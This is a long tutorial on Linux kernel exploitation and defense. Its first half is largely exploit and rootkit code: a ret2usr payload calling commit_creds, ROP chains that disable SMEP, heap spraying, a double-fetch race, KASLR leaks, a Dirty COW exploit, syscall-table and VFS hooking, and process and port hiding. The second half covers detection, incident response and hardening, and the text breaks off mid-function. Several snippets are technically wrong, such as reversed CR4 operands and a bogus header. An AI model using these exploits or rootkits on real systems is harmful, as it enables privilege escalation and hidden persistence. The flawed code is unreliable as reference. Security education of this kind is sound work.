Linux Kernel Exploitation and Defense: Understanding Attack Techniques and Building Robust Defenses#

Understanding how kernel exploits work is crucial for building effective defenses. This comprehensive guide explores common kernel exploitation techniques, analyzes real-world vulnerabilities, and provides practical defensive strategies to protect against sophisticated attacks.

The Kernel Attack Landscape#

Why Target the Kernel?#

The kernel represents the ultimate target for attackers:

Complete System Control: Kernel compromise means game over
Bypass All Security: Disable SELinux, AppArmor, and other protections
Persistent Access: Install undetectable rootkits
Data Exfiltration: Access all memory and files
Hardware Control: Direct access to devices and firmware

Common Vulnerability Classes#

1
/* 1. Buffer Overflow - Classic stack/heap overflow */
2
static int vulnerable_ioctl(unsigned long arg) {
3
    char buffer[64];
4
    struct user_input input;
5

6
    // Vulnerable: No size validation
7
    if (copy_from_user(&input, (void __user *)arg, sizeof(input)))
8
        return -EFAULT;
9

10
    // Stack overflow if input.size > 64
11
    if (copy_from_user(buffer, input.data, input.size))
12
        return -EFAULT;
13

14
    return 0;
15
}
16

17
/* 2. Use-After-Free (UAF) */
18
struct vulnerable_struct {
19
    void (*callback)(void);
20
    int data;
21
};
22

23
static void trigger_uaf(void) {
24
    struct vulnerable_struct *vuln = kmalloc(sizeof(*vuln), GFP_KERNEL);
25

26
    vuln->callback = legitimate_function;
27
    kfree(vuln);
28

29
    // UAF: Using freed memory
30
    vuln->callback();  // Attacker can control this
31
}
32

33
/* 3. Race Condition */
34
static int refcount = 0;
35
static struct resource *shared_resource;
36

37
static int vulnerable_open(struct inode *inode, struct file *file) {
38
    // Race window between check and use
39
    if (refcount > 0)
40
        return -EBUSY;
41

42
    // Another thread can increment refcount here
43

44
    refcount++;
45
    shared_resource = allocate_resource();
46
    return 0;
47
}
48

49
/* 4. Integer Overflow */
50
static int vulnerable_alloc(unsigned int count, unsigned int size) {
51
    void *buffer;
52

53
    // Integer overflow: count * size can overflow
54
    buffer = kmalloc(count * size, GFP_KERNEL);
55
    if (!buffer)
56
        return -ENOMEM;
57

58
    // Later code assumes buffer is count*size bytes
59
    return 0;
60
}
61

62
/* 5. Information Leak */
63
static long vulnerable_read(char __user *buf, size_t count) {
64
    struct kernel_data data;
65

66
    // Uninitialized stack variable
67
    // May contain sensitive kernel data
68

69
    data.public_field = 0x41414141;
70
    // data.private_field is uninitialized!
71

72
    if (copy_to_user(buf, &data, sizeof(data)))
73
        return -EFAULT;
74

75
    return sizeof(data);
76
}

Exploitation Techniques#

1. ret2usr - Return to Userspace#

1
// Exploit technique: Redirect kernel execution to user-controlled code
2

3
/* Vulnerable kernel code */
4
struct ops {
5
    void (*func)(void);
6
};
7

8
static void vulnerable_function(struct ops *user_ops) {
9
    struct ops *ops;
10

11
    ops = kmalloc(sizeof(*ops), GFP_KERNEL);
12

13
    // Vulnerable: Trusting user pointer
14
    if (copy_from_user(ops, user_ops, sizeof(*ops))) {
15
        kfree(ops);
16
        return;
17
    }
18

19
    // Call user-controlled function pointer
20
    ops->func();  // Can point to userspace!
21
}
22

23
/* Exploit code */
24
#include <stdio.h>
25
#include <sys/mmap.h>
26

27
// Exploit payload in userspace
28
void exploit_payload(void) {
29
    // We're in kernel context but executing user code!
30
    __asm__(
31
        // Disable SMEP/SMAP if needed
32
        "mov cr4, rax\n"
33
        "and rax, ~(1 << 20)\n"  // Clear SMEP bit
34
        "mov rax, cr4\n"
35

36
        // Elevate privileges
37
        "mov rax, 0\n"            // prepare_kernel_cred(0)
38
        "call prepare_kernel_cred\n"
39
        "mov rdi, rax\n"
40
        "call commit_creds\n"     // commit_creds(prepare_kernel_cred(0))
41

42
        // Return to userspace
43
        "swapgs\n"
44
        "iretq\n"
45
    );
46
}
47

48
int main() {
49
    struct ops evil_ops = {
50
        .func = exploit_payload
51
    };
52

53
    // Trigger vulnerable ioctl
54
    ioctl(fd, VULNERABLE_IOCTL, &evil_ops);
55

56
    // We should have root now
57
    system("/bin/sh");
58
}

2. ROP/JOP - Code Reuse Attacks#

1
/* ROP Chain Construction */
2

3
// Find gadgets in kernel
4
// gadget 1: pop rdi; ret
5
// gadget 2: mov cr4, rdi; ret
6
// gadget 3: prepare_kernel_cred
7
// gadget 4: commit_creds
8

9
unsigned long rop_chain[] = {
10
    POP_RDI_RET,        // gadget 1
11
    CR4_VALUE_NO_SMEP,  // value for cr4
12
    MOV_CR4_RDI_RET,    // gadget 2
13
    POP_RDI_RET,        // gadget 1
14
    0,                  // NULL for prepare_kernel_cred
15
    PREPARE_KERNEL_CRED,// gadget 3
16
    POP_RDI_RET,        // gadget 1
17
    // Return value from previous call goes to rdi
18
    COMMIT_CREDS,       // gadget 4
19
    USERSPACE_RETURN    // Clean return to userspace
20
};
21

22
/* Trigger overflow with ROP chain */
23
void trigger_exploit(void) {
24
    char buffer[512];
25

26
    // Fill buffer to overflow point
27
    memset(buffer, 'A', 64);
28

29
    // Overwrite return address with ROP chain
30
    memcpy(buffer + 64, rop_chain, sizeof(rop_chain));
31

32
    // Trigger vulnerable syscall
33
    syscall(VULNERABLE_SYSCALL, buffer, sizeof(buffer));
34
}

3. Kernel Heap Exploitation#

1
/* Heap Spray Technique */
2

3
// Step 1: Spray kernel heap with controlled objects
4
void heap_spray(void) {
5
    int spray_fds[SPRAY_COUNT];
6

7
    for (int i = 0; i < SPRAY_COUNT; i++) {
8
        // Each open() allocates kernel structures
9
        spray_fds[i] = open("/dev/null", O_RDONLY);
10

11
        // Control content via ioctl
12
        ioctl(spray_fds[i], SET_CALLBACK, controlled_data);
13
    }
14
}
15

16
// Step 2: Create holes in heap
17
void create_holes(void) {
18
    // Close every other fd to create holes
19
    for (int i = 0; i < SPRAY_COUNT; i += 2) {
20
        close(spray_fds[i]);
21
    }
22
}
23

24
// Step 3: Trigger UAF to allocate in hole
25
void trigger_uaf(void) {
26
    // Vulnerable driver allocates in our controlled hole
27
    ioctl(vuln_fd, TRIGGER_UAF, size_matching_hole);
28
}
29

30
/* SLUB Cache Exploitation */
31
struct target_object {
32
    void (*fn_ptr)(void);
33
    char buffer[56];
34
};
35

36
void exploit_slub(void) {
37
    // 1. Allocate many objects in same cache
38
    int fds[256];
39
    for (int i = 0; i < 256; i++) {
40
        fds[i] = open("/dev/vuln", O_RDONLY);
41
    }
42

43
    // 2. Free some to create free list
44
    for (int i = 0; i < 256; i += 2) {
45
        close(fds[i]);
46
    }
47

48
    // 3. Overflow into free list pointer
49
    char overflow[128];
50
    memset(overflow, 'A', 64);
51
    *(unsigned long *)(overflow + 64) = CONTROLLED_ADDRESS;
52

53
    ioctl(fds[1], OVERFLOW_IOCTL, overflow);
54

55
    // 4. Next allocation returns our controlled address
56
    int evil_fd = open("/dev/vuln", O_RDONLY);
57

58
    // 5. Write to arbitrary address
59
    write(evil_fd, shellcode, sizeof(shellcode));
60
}

4. Race Condition Exploitation#

1
/* Double-Fetch Vulnerability */
2

3
// Vulnerable kernel code
4
static long vulnerable_ioctl(struct file *file, unsigned int cmd,
5
                           unsigned long arg) {
6
    struct user_request req;
7
    void *buffer;
8

9
    // First fetch - TIME-OF-CHECK
10
    if (copy_from_user(&req, (void __user *)arg, sizeof(req)))
11
        return -EFAULT;
12

13
    if (req.size > MAX_SIZE)
14
        return -EINVAL;
15

16
    buffer = kmalloc(req.size, GFP_KERNEL);
17

18
    // Second fetch - TIME-OF-USE
19
    if (copy_from_user(&req, (void __user *)arg, sizeof(req)))
20
        return -EFAULT;
21

22
    // req.size could have changed!
23
    if (copy_from_user(buffer, req.data, req.size)) // Overflow!
24
        return -EFAULT;
25

26
    return 0;
27
}
28

29
/* Exploit using racing threads */
30
#include <pthread.h>
31

32
struct user_request *shared_req;
33
volatile int stop_race = 0;
34

35
void *race_thread(void *arg) {
36
    while (!stop_race) {
37
        shared_req->size = 64;    // Valid size
38
        usleep(1);
39
        shared_req->size = 1024;  // Overflow size
40
        usleep(1);
41
    }
42
    return NULL;
43
}
44

45
void exploit_double_fetch(void) {
46
    pthread_t thread;
47

48
    shared_req = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE,
49
                     MAP_SHARED | MAP_ANONYMOUS, -1, 0);
50

51
    shared_req->size = 64;
52
    shared_req->data = exploit_buffer;
53

54
    pthread_create(&thread, NULL, race_thread, NULL);
55

56
    // Trigger race - will eventually hit the window
57
    for (int i = 0; i < 10000; i++) {
58
        ioctl(fd, VULNERABLE_IOCTL, shared_req);
59
    }
60

61
    stop_race = 1;
62
    pthread_join(thread, NULL);
63
}

Advanced Exploitation: Bypassing Mitigations#

1. Bypassing KASLR#

1
/* Information Leak to Defeat KASLR */
2

3
// Method 1: Side-channel via prefetch
4
unsigned long leak_kernel_base(void) {
5
    unsigned long min_addr = 0xffffffff80000000;
6
    unsigned long max_addr = 0xffffffffc0000000;
7
    unsigned long kernel_base = 0;
8

9
    for (unsigned long addr = min_addr; addr < max_addr; addr += 0x100000) {
10
        unsigned long time1 = rdtsc();
11

12
        // Prefetch instruction
13
        __asm__ volatile("prefetcht0 (%0)" : : "r"(addr));
14

15
        unsigned long time2 = rdtsc();
16

17
        // Kernel addresses take less time (in cache)
18
        if (time2 - time1 < THRESHOLD) {
19
            kernel_base = addr & ~0xfffff;  // Align to 2MB
20
            break;
21
        }
22
    }
23

24
    return kernel_base;
25
}
26

27
// Method 2: Kernel pointer leak
28
struct leaked_data {
29
    unsigned long kernel_ptr;
30
    char padding[56];
31
};
32

33
unsigned long find_kernel_base(int fd) {
34
    struct leaked_data data;
35

36
    // Trigger info leak vulnerability
37
    ioctl(fd, LEAK_IOCTL, &data);
38

39
    // Calculate base from leaked pointer
40
    // Kernel text is usually at offset 0
41
    return data.kernel_ptr & 0xffffffffff000000;
42
}

2. Bypassing SMEP/SMAP#

1
/* Native Code to Disable SMEP/SMAP */
2

3
// CR4 register bits
4
#define CR4_SMEP (1 << 20)
5
#define CR4_SMAP (1 << 21)
6

7
void disable_smep_smap(void) {
8
    unsigned long cr4;
9

10
    // Read current CR4
11
    __asm__ volatile("mov %%cr4, %0" : "=r"(cr4));
12

13
    // Clear SMEP and SMAP bits
14
    cr4 &= ~(CR4_SMEP | CR4_SMAP);
15

16
    // Write back - requires kernel privilege
17
    __asm__ volatile("mov %0, %%cr4" : : "r"(cr4));
18
}
19

20
/* ROP Gadget Method */
21
// Find gadgets:
22
// pop rdi; ret
23
// mov cr4, rdi; ret
24

25
unsigned long rop_disable_protections[] = {
26
    GADGET_POP_RDI,
27
    CR4_VALUE_NO_SMEP_SMAP,
28
    GADGET_MOV_CR4_RDI,
29
    // Continue exploitation...
30
};

3. Bypassing KPTI#

1
/* KPTI Bypass via Kernel Memory Layout Knowledge */
2

3
// KPTI separates user/kernel page tables
4
// But some pages must be mapped in both
5

6
struct kpti_bypass {
7
    // Target KPTI trampoline pages
8
    unsigned long trampoline_addr;
9

10
    // Or target cpu_entry_area (always mapped)
11
    unsigned long cpu_entry_addr;
12
};
13

14
// Use these always-mapped regions for exploitation
15
void exploit_with_kpti(void) {
16
    // Place shellcode in user-kernel shared region
17
    void *shared = mmap(FIXED_ADDR, PAGE_SIZE,
18
                       PROT_READ | PROT_WRITE | PROT_EXEC,
19
                       MAP_FIXED | MAP_ANONYMOUS | MAP_SHARED, -1, 0);
20

21
    memcpy(shared, kernel_shellcode, sizeof(kernel_shellcode));
22

23
    // Redirect execution to shared region
24
    trigger_vulnerability(FIXED_ADDR);
25
}

Real-World Vulnerability Analysis#

CVE-2016-5195 (Dirty COW)#

1
/* Dirty COW - Race condition in get_user_pages */
2

3
// Vulnerable code path (simplified)
4
int get_user_pages(unsigned long start, int nr_pages, int write,
5
                  struct page **pages) {
6
    // ...
7
    if (write && !pte_write(pte)) {
8
        // Copy-on-write handling
9
        // RACE WINDOW: Between check and action
10
        do_wp_page(mm, vma, address, pte);
11
    }
12
    // ...
13
}
14

15
/* Exploit Implementation */
16
#include <sys/mman.h>
17
#include <fcntl.h>
18
#include <pthread.h>
19
#include <string.h>
20

21
void *map;
22
int f;
23
struct stat st;
24
char *name;
25

26
void *madvise_thread(void *arg) {
27
    while (1) {
28
        madvise(map, st.st_size, MADV_DONTNEED);
29
    }
30
    return NULL;
31
}
32

33
void *write_thread(void *arg) {
34
    int f = open("/proc/self/mem", O_RDWR);
35
    while (1) {
36
        // Write to private mapping -> triggers COW
37
        lseek(f, (unsigned long)map, SEEK_SET);
38
        write(f, "hacked", 6);
39
    }
40
    return NULL;
41
}
42

43
void exploit_dirtycow(char *filename) {
44
    pthread_t pth1, pth2;
45

46
    f = open(filename, O_RDONLY);
47
    fstat(f, &st);
48

49
    // Create private mapping of file
50
    map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
51

52
    // Race MADV_DONTNEED with write
53
    pthread_create(&pth1, NULL, madvise_thread, NULL);
54
    pthread_create(&pth2, NULL, write_thread, NULL);
55

56
    // Wait for exploitation
57
    pthread_join(pth1, NULL);
58
    pthread_join(pth2, NULL);
59
}

CVE-2017-1000112 (UFO Vulnerability)#

1
/* UFO (UDP Fragment Offload) Exploit */
2

3
// Vulnerable code - integer overflow in UFO
4
static int udp_sendmsg(struct sock *sk, struct msghdr *msg, size_t len) {
5
    // ...
6
    if (up->pending) {
7
        // Fragment handling
8
        // Integer overflow in size calculation
9
        mtu = dst_mtu(&rt->dst);
10

11
        // Overflow here!
12
        if (len > mtu - sizeof(struct udphdr))
13
            fragment_size = len / (mtu - sizeof(struct udphdr));
14
    }
15
    // ...
16
}
17

18
/* Exploit trigger */
19
void trigger_ufo_overflow(void) {
20
    int sock = socket(AF_INET, SOCK_DGRAM, 0);
21
    struct sockaddr_in addr = {
22
        .sin_family = AF_INET,
23
        .sin_port = htons(1337),
24
        .sin_addr.s_addr = inet_addr("127.0.0.1")
25
    };
26

27
    // Set up UFO
28
    int val = 1;
29
    setsockopt(sock, SOL_SOCKET, SO_NO_CHECK, &val, sizeof(val));
30

31
    // Trigger overflow with crafted size
32
    char buffer[65507];  // Max UDP size
33
    memset(buffer, 'A', sizeof(buffer));
34

35
    // This triggers integer overflow in kernel
36
    sendto(sock, buffer, sizeof(buffer), MSG_MORE,
37
           (struct sockaddr *)&addr, sizeof(addr));
38
}

Kernel Rootkit Techniques#

1. System Call Table Hooking#

1
/* Classic Syscall Hooking */
2

3
// Find syscall table
4
unsigned long *find_syscall_table(void) {
5
    unsigned long *syscall_table;
6
    unsigned long int i;
7

8
    // Search for sys_close reference
9
    for (i = PAGE_OFFSET; i < ULLONG_MAX; i += sizeof(void *)) {
10
        syscall_table = (unsigned long *)i;
11

12
        if (syscall_table[__NR_close] == (unsigned long)sys_close)
13
            return syscall_table;
14
    }
15

16
    return NULL;
17
}
18

19
// Hook implementation
20
asmlinkage long (*original_open)(const char __user *, int, umode_t);
21

22
asmlinkage long hooked_open(const char __user *filename, int flags,
23
                          umode_t mode) {
24
    char fname[256];
25

26
    // Copy filename from userspace
27
    strncpy_from_user(fname, filename, sizeof(fname));
28

29
    // Hide rootkit files
30
    if (strstr(fname, "rootkit")) {
31
        return -ENOENT;
32
    }
33

34
    return original_open(filename, flags, mode);
35
}
36

37
void install_hook(void) {
38
    unsigned long *syscall_table = find_syscall_table();
39

40
    // Disable write protection
41
    write_cr0(read_cr0() & ~X86_CR0_WP);
42

43
    // Save original and install hook
44
    original_open = (void *)syscall_table[__NR_open];
45
    syscall_table[__NR_open] = (unsigned long)hooked_open;
46

47
    // Re-enable write protection
48
    write_cr0(read_cr0() | X86_CR0_WP);
49
}

2. VFS Hooking#

1
/* File Operations Hooking */
2

3
struct file_operations *get_fop(const char *path) {
4
    struct file *file;
5

6
    file = filp_open(path, O_RDONLY, 0);
7
    if (IS_ERR(file))
8
        return NULL;
9

10
    return (struct file_operations *)file->f_op;
11
}
12

13
// Hook directory operations
14
int (*original_iterate)(struct file *, struct dir_context *);
15

16
int hooked_iterate(struct file *file, struct dir_context *ctx) {
17
    int ret = original_iterate(file, ctx);
18

19
    // Filter out hidden entries
20
    // Complex implementation needed to properly filter
21

22
    return ret;
23
}
24

25
void hook_vfs(void) {
26
    struct file_operations *fops;
27

28
    fops = get_fop("/");
29
    original_iterate = fops->iterate_shared;
30

31
    // Disable write protection and hook
32
    disable_wp();
33
    fops->iterate_shared = hooked_iterate;
34
    enable_wp();
35
}

3. Kernel Object Manipulation#

1
/* Direct Kernel Object Manipulation (DKOM) */
2

3
// Hide process by unlinking from task list
4
void hide_process(pid_t pid) {
5
    struct task_struct *task;
6

7
    // Find task
8
    task = pid_task(find_vpid(pid), PIDTYPE_PID);
9
    if (!task)
10
        return;
11

12
    // Remove from task list
13
    list_del(&task->tasks);
14

15
    // Remove from PID hash
16
    detach_pid(task, PIDTYPE_PID);
17
}
18

19
// Hide network connections
20
void hide_tcp_port(unsigned short port) {
21
    struct sock *sk;
22
    struct hlist_nulls_node *node;
23

24
    // Iterate TCP hash table
25
    sk_nulls_for_each(sk, node, &tcp_hashinfo.ehash[port].chain) {
26
        if (sk->sk_num == port) {
27
            // Remove from hash table
28
            sk_nulls_del_node_init_rcu(sk);
29
        }
30
    }
31
}

Detection and Defense Strategies#

1. Runtime Kernel Protection#

1
/* Kernel Runtime Security Monitor */
2

3
#include <linux/kprobes.h>
4
#include <linux/ptrace.h>
5

6
// Monitor critical functions
7
static struct kprobe kp_commit_creds = {
8
    .symbol_name = "commit_creds",
9
};
10

11
static int handler_commit_creds(struct kprobe *p, struct pt_regs *regs) {
12
    struct cred *new = (struct cred *)regs->di;
13

14
    // Check for privilege escalation
15
    if (new->uid.val == 0 && current_uid().val != 0) {
16
        pr_alert("Privilege escalation detected! PID: %d\n",
17
                current->pid);
18

19
        // Kill the process
20
        force_sig(SIGKILL);
21

22
        return 1;  // Skip original function
23
    }
24

25
    return 0;
26
}
27

28
// Monitor module loading
29
static int module_notifier(struct notifier_block *nb,
30
                         unsigned long action, void *data) {
31
    struct module *mod = data;
32

33
    if (action == MODULE_STATE_COMING) {
34
        // Verify module signature
35
        if (!mod->sig_ok) {
36
            pr_alert("Unsigned module blocked: %s\n", mod->name);
37
            return NOTIFY_BAD;
38
        }
39

40
        // Check for rootkit patterns
41
        if (is_rootkit_pattern(mod)) {
42
            pr_alert("Suspected rootkit blocked: %s\n", mod->name);
43
            return NOTIFY_BAD;
44
        }
45
    }
46

47
    return NOTIFY_OK;
48
}
49

50
static struct notifier_block module_nb = {
51
    .notifier_call = module_notifier,
52
};
53

54
int init_protection(void) {
55
    // Register kprobes
56
    kp_commit_creds.pre_handler = handler_commit_creds;
57
    register_kprobe(&kp_commit_creds);
58

59
    // Register module notifier
60
    register_module_notifier(&module_nb);
61

62
    return 0;
63
}

2. Exploit Detection#

1
/* Stack Pivot Detection */
2

3
void check_stack_pivot(struct pt_regs *regs) {
4
    unsigned long stack_start = current->stack;
5
    unsigned long stack_end = stack_start + THREAD_SIZE;
6

7
    // Check if RSP points outside stack
8
    if (regs->sp < stack_start || regs->sp > stack_end) {
9
        pr_alert("Stack pivot detected! PID: %d RSP: %lx\n",
10
                current->pid, regs->sp);
11

12
        // Dump registers for analysis
13
        show_regs(regs);
14

15
        // Terminate process
16
        force_sig(SIGSEGV);
17
    }
18
}
19

20
/* ROP/JOP Detection */
21

22
#define MAX_RET_DEPTH 10
23

24
int detect_rop_chain(unsigned long *stack_ptr) {
25
    int ret_count = 0;
26
    unsigned long addr;
27

28
    for (int i = 0; i < 100; i++) {
29
        if (get_user(addr, &stack_ptr[i]))
30
            break;
31

32
        // Check if address is a 'ret' instruction
33
        if (is_ret_instruction(addr)) {
34
            ret_count++;
35

36
            if (ret_count > MAX_RET_DEPTH) {
37
                pr_alert("ROP chain detected!\n");
38
                return 1;
39
            }
40
        } else {
41
            ret_count = 0;
42
        }
43
    }
44

45
    return 0;
46
}

3. Kernel Integrity Monitoring#

1
/* Critical Structure Monitoring */
2

3
struct integrity_check {
4
    void *address;
5
    size_t size;
6
    u8 hash[32];  // SHA-256
7
};
8

9
static struct integrity_check critical_structures[] = {
10
    { &sys_call_table, sizeof(sys_call_table), {0} },
11
    { &idt_table, sizeof(idt_table), {0} },
12
    { &security_ops, sizeof(security_ops), {0} },
13
};
14

15
void check_kernel_integrity(void) {
16
    u8 current_hash[32];
17

18
    for (int i = 0; i < ARRAY_SIZE(critical_structures); i++) {
19
        // Calculate current hash
20
        calculate_sha256(critical_structures[i].address,
21
                        critical_structures[i].size,
22
                        current_hash);
23

24
        // Compare with stored hash
25
        if (memcmp(current_hash, critical_structures[i].hash, 32)) {
26
            pr_alert("Kernel structure modified: %p\n",
27
                    critical_structures[i].address);
28

29
            // Trigger incident response
30
            kernel_integrity_violated();
31
        }
32
    }
33
}
34

35
/* Periodic Integrity Timer */
36
static struct timer_list integrity_timer;
37

38
void integrity_timer_callback(struct timer_list *t) {
39
    check_kernel_integrity();
40

41
    // Re-arm timer
42
    mod_timer(&integrity_timer, jiffies + HZ * 60);  // Every minute
43
}

4. Advanced Rootkit Detection#

1
/* Hidden Process Detection */
2

3
void detect_hidden_processes(void) {
4
    struct task_struct *task;
5
    pid_t *pid_list;
6
    int count = 0;
7

8
    // Method 1: Compare /proc with task list
9
    rcu_read_lock();
10
    for_each_process(task) {
11
        if (!proc_pid_lookup(task->pid)) {
12
            pr_alert("Hidden process found: PID %d\n", task->pid);
13
        }
14
    }
15
    rcu_read_unlock();
16

17
    // Method 2: Check scheduling queues
18
    detect_scheduler_manipulation();
19

20
    // Method 3: Memory scanning for EPROCESS structures
21
    scan_memory_for_processes();
22
}
23

24
/* Syscall Table Restoration */
25

26
void restore_syscall_table(void) {
27
    unsigned long *table = find_syscall_table();
28

29
    // Restore from known good copy
30
    disable_wp();
31
    memcpy(table, original_syscall_table,
32
           __NR_syscalls * sizeof(unsigned long));
33
    enable_wp();
34

35
    pr_info("Syscall table restored\n");
36
}

Building Secure Kernel Modules#

Secure Coding Practices#

1
/* Secure Module Template */
2

3
#include <linux/module.h>
4
#include <linux/kernel.h>
5
#include <linux/security.h>
6

7
// Use proper error handling
8
static int secure_open(struct inode *inode, struct file *file) {
9
    int ret;
10

11
    // Validate inputs
12
    if (!inode || !file)
13
        return -EINVAL;
14

15
    // Check permissions
16
    ret = security_file_permission(file, MAY_READ);
17
    if (ret)
18
        return ret;
19

20
    // Use GFP_KERNEL_ACCOUNT for user-triggered allocations
21
    file->private_data = kzalloc(sizeof(struct private_data),
22
                                GFP_KERNEL_ACCOUNT);
23
    if (!file->private_data)
24
        return -ENOMEM;
25

26
    return 0;
27
}
28

29
// Proper cleanup
30
static int secure_release(struct inode *inode, struct file *file) {
31
    // Clear sensitive data
32
    if (file->private_data) {
33
        memzero_explicit(file->private_data,
34
                        sizeof(struct private_data));
35
        kfree(file->private_data);
36
    }
37

38
    return 0;
39
}
40

41
// Input validation
42
static long secure_ioctl(struct file *file, unsigned int cmd,
43
                       unsigned long arg) {
44
    struct user_request req;
45

46
    // Bounds check command
47
    if (_IOC_TYPE(cmd) != SECURE_IOC_MAGIC)
48
        return -ENOTTY;
49

50
    if (_IOC_NR(cmd) > SECURE_IOC_MAXNR)
51
        return -ENOTTY;
52

53
    // Safe copy from user
54
    if (copy_from_user(&req, (void __user *)arg, sizeof(req)))
55
        return -EFAULT;
56

57
    // Validate all fields
58
    if (req.size > MAX_REQUEST_SIZE)
59
        return -EINVAL;
60

61
    // Use exact allocation size
62
    void *buffer = kmalloc(req.size, GFP_KERNEL);
63
    if (!buffer)
64
        return -ENOMEM;
65

66
    // Process request...
67

68
    kfree(buffer);
69
    return 0;
70
}

Module Hardening#

1
/* Hardened Module Initialization */
2

3
static int __init secure_module_init(void) {
4
    int ret;
5

6
    // Verify kernel version compatibility
7
    if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 10, 0)) {
8
        pr_err("Kernel version too old\n");
9
        return -EINVAL;
10
    }
11

12
    // Check security frameworks
13
    if (!security_module_enable("capability")) {
14
        pr_err("Required security module not available\n");
15
        return -EINVAL;
16
    }
17

18
    // Register with strict permissions
19
    ret = misc_register(&secure_device);
20
    if (ret) {
21
        pr_err("Failed to register device\n");
22
        return ret;
23
    }
24

25
    // Set restrictive permissions
26
    secure_device.this_device->devt->mode = 0600;
27

28
    // Initialize security features
29
    init_random_key();
30
    setup_integrity_checking();
31

32
    pr_info("Secure module loaded\n");
33
    return 0;
34
}
35

36
// Protect against forced unload
37
static void __exit secure_module_exit(void) {
38
    // Verify authorized unload
39
    if (!authorized_unload()) {
40
        pr_err("Unauthorized module unload attempt\n");
41
        return;  // Refuse to unload
42
    }
43

44
    // Clean up securely
45
    destroy_crypto_keys();
46
    misc_deregister(&secure_device);
47
}
48

49
module_init(secure_module_init);
50
module_exit(secure_module_exit);
51

52
MODULE_LICENSE("GPL");
53
MODULE_AUTHOR("Security Team");
54
MODULE_DESCRIPTION("Hardened kernel module");
55
MODULE_VERSION("1.0");
56

57
// Enforce signature requirement
58
MODULE_INFO(sig_enforce, "Y");

Incident Response#

Kernel Compromise Response#

1
#!/bin/bash
2
echo "Kernel Incident Response Script"
3
echo "=============================="
4

5
# 1. Isolate the system
6
echo "Isolating system..."
7
iptables -P INPUT DROP
8
iptables -P OUTPUT DROP
9
iptables -P FORWARD DROP
10

11
# 2. Collect evidence
12
echo "Collecting evidence..."
13
mkdir -p /evidence/{memory,disk,logs}
14

15
# Dump kernel memory
16
insmod /tools/lime.ko "path=/evidence/memory/kernel.lime format=lime"
17

18
# Save system state
19
ps auxww > /evidence/system_processes.txt
20
netstat -an > /evidence/network_connections.txt
21
lsmod > /evidence/loaded_modules.txt
22
mount > /evidence/mounted_filesystems.txt
23

24
# Copy critical logs
25
cp -r /var/log/* /evidence/logs/
26
dmesg > /evidence/logs/dmesg.txt
27

28
# 3. Check for rootkits
29
echo "Checking for rootkits..."
30
rkhunter --check --skip-keypress
31
chkrootkit
32

33
# 4. Analyze kernel integrity
34
echo "Checking kernel integrity..."
35
cat /proc/kallsyms > /evidence/kallsyms.txt
36
cat /proc/modules > /evidence/modules.txt
37

38
# Compare with known good values
39
diff /evidence/kallsyms.txt /secure/baseline/kallsyms.txt
40

41
# 5. Look for persistence mechanisms
42
echo "Checking persistence..."
43
find / -type f -perm -4000 -ls > /evidence/suid_files.txt
44
crontab -l > /evidence/crontab.txt
45
systemctl list-unit-files > /evidence/systemd_units.txt
46

47
echo "Initial response complete. System isolated."

Live Forensics#

1
/* Live Kernel Memory Analysis */
2

3
#include <linux/module.h>
4
#include <linux/kallsyms.h>
5
#include <linux/slab.h>
6

7
void analyze_kernel_memory(void) {
8
    unsigned long *syscall_table;
9
    void *commit_creds_addr;
10

11
    // Find critical functions
12
    syscall_table = (unsigned long *)kallsyms_lookup_name("sys_call_table");
13
    commit_creds_addr = (void *)kallsyms_lookup_name("commit_creds");
14

15
    pr_info("Syscall table at: %p\n", syscall_table);
16
    pr_info("commit_creds at: %p\n", commit_creds_addr);
17

18
    // Check for hooks
19
    if (syscall_table[__NR_open] != kallsyms_lookup_name("sys_open")) {
20
        pr_alert("sys_open is hooked!\n");
21
        pr_alert("Hooked address: %lx\n", syscall_table[__NR_open]);
22
    }
23

24
    // Scan for inline hooks
25
    check_inline_hooks(commit_creds_addr);
26
}
27

28
/* Memory Pattern Scanner */
29
void scan_for_shellcode(void) {
30
    struct page *page;
31
    void *addr;
32

33
    // Common shellcode patterns
34
    unsigned char patterns[][8] = {
35
        {0x48, 0x31, 0xc0, 0x48, 0x89, 0xc7, 0xe8}, // xor rax,rax; mov rdi,rax; call
36
        {0x0f, 0x01, 0xf8, 0x65, 0x48, 0x89, 0x24}, // swapgs; mov [rsp],reg
37
        {0x0f, 0x05, 0x48, 0x89, 0xc7, 0xe8},       // syscall; mov rdi,rax; call
38
    };
39

40
    for_each_zone_page(page) {
41
        if (!page || PageReserved(page))
42
            continue;
43

44
        addr = kmap_atomic(page);
45

46
        for (int i = 0; i < ARRAY_SIZE(patterns); i++) {
47
            if (memmem(addr, PAGE_SIZE, patterns[i],
48
                      sizeof(patterns[i]))) {
49
                pr_alert("Shellcode pattern found at %p\n",
50
                        page_address(page));
51
            }
52
        }
53

54
        kunmap_atomic(addr);
55
    }
56
}

Prevention Best Practices#

1. Secure Development#

1
/* Security Checklist for Kernel Modules */
2

3
// ✓ Input validation
4
if (!access_ok(user_buffer, size))
5
    return -EFAULT;
6

7
// ✓ Bounds checking
8
if (index >= ARRAY_SIZE(array))
9
    return -EINVAL;
10

11
// ✓ Integer overflow protection
12
if (count > SIZE_MAX / size)
13
    return -EOVERFLOW;
14

15
// ✓ Use safe string functions
16
strscpy(dest, src, sizeof(dest));
17

18
// ✓ Proper locking
19
mutex_lock(&resource_mutex);
20
// ... critical section ...
21
mutex_unlock(&resource_mutex);
22

23
// ✓ Error handling
24
ptr = kmalloc(size, GFP_KERNEL);
25
if (!ptr)
26
    return -ENOMEM;
27

28
// ✓ Cleanup on error paths
29
error_path:
30
    kfree(allocated_memory);
31
    mutex_unlock(&lock);
32
    return ret;

2. Runtime Protections#

1
# Kernel hardening checklist
2
cat > /etc/sysctl.d/99-security.conf << EOF
3
# Kernel exploit mitigation
4
kernel.kptr_restrict = 2
5
kernel.dmesg_restrict = 1
6
kernel.perf_event_paranoid = 3
7
kernel.yama.ptrace_scope = 2
8
kernel.unprivileged_bpf_disabled = 1
9

10
# Memory protections
11
vm.mmap_min_addr = 65536
12
vm.mmap_rnd_bits = 32
13
vm.mmap_rnd_compat_bits = 16
14

15
# Disable dangerous features
16
kernel.sysrq = 0
17
kernel.core_uses_pid = 1
18
kernel.modules_disabled = 1
19
EOF

3. Monitoring and Alerting#

1
/* Kernel Security Event Monitor */
2

3
static void security_event(enum event_type type, const char *msg) {
4
    struct audit_buffer *ab;
5

6
    ab = audit_log_start(NULL, GFP_KERNEL, AUDIT_KERNEL);
7
    if (!ab)
8
        return;
9

10
